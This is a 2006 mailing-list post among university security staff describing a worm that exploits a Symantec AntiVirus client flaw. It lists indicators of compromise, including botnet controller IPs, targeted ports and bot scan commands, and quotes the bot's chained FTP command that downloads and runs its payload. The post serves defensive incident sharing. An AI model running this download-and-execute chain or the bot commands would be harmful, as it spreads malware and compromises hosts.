[unisog] Worm exploiting Symantec client defect?????

Cam Beasley cam at austin.utexas.edu
Mon Nov 27 22:44:45 GMT 2006


- a reptile bot it seems
- uses VMware and debugger detection
- IRC Based C&C with a modified version of UnrealIRCD
- Ops go by god and G00D
- the botnet controller was at 38.118.143.201:6667
  but just recently jumped to 64.143.184.7:6667
- initial attack vectors target tcp/2967 & tcp/6236
- compromised hosts participate in a NetBIOS & VNC scan of
  local networks
- common bot commands are:
  .asc -S -s
  .asc mass445 100 5 0 -b -r -e -h
  .asc rtvscan 100 5 0
- malcode is transferred thusly:
  echo open X.X.X.X 2100  >  i&echo user 1 1  >  >  i
  &echo get w32svc.exe  >  >  i &echo quit  >  >  i &ftp
  -As:i &w32svc.exe &exit
- w32svc.exe is dumped to C:\Program Files\Symantec AntiVirus
- Symantec wasn't identifying the malcode 'w32svc.exe' the
  last time i checked..

~cam.





On 11/27/06 4:22 PM, "Gary Flynn" <flynngn at jmu.edu> wrote:

> Anyone know anything more about what SANS
> is reporting on this?
> 
> http://isc.sans.org//index.php
> 


More information about the unisog mailing list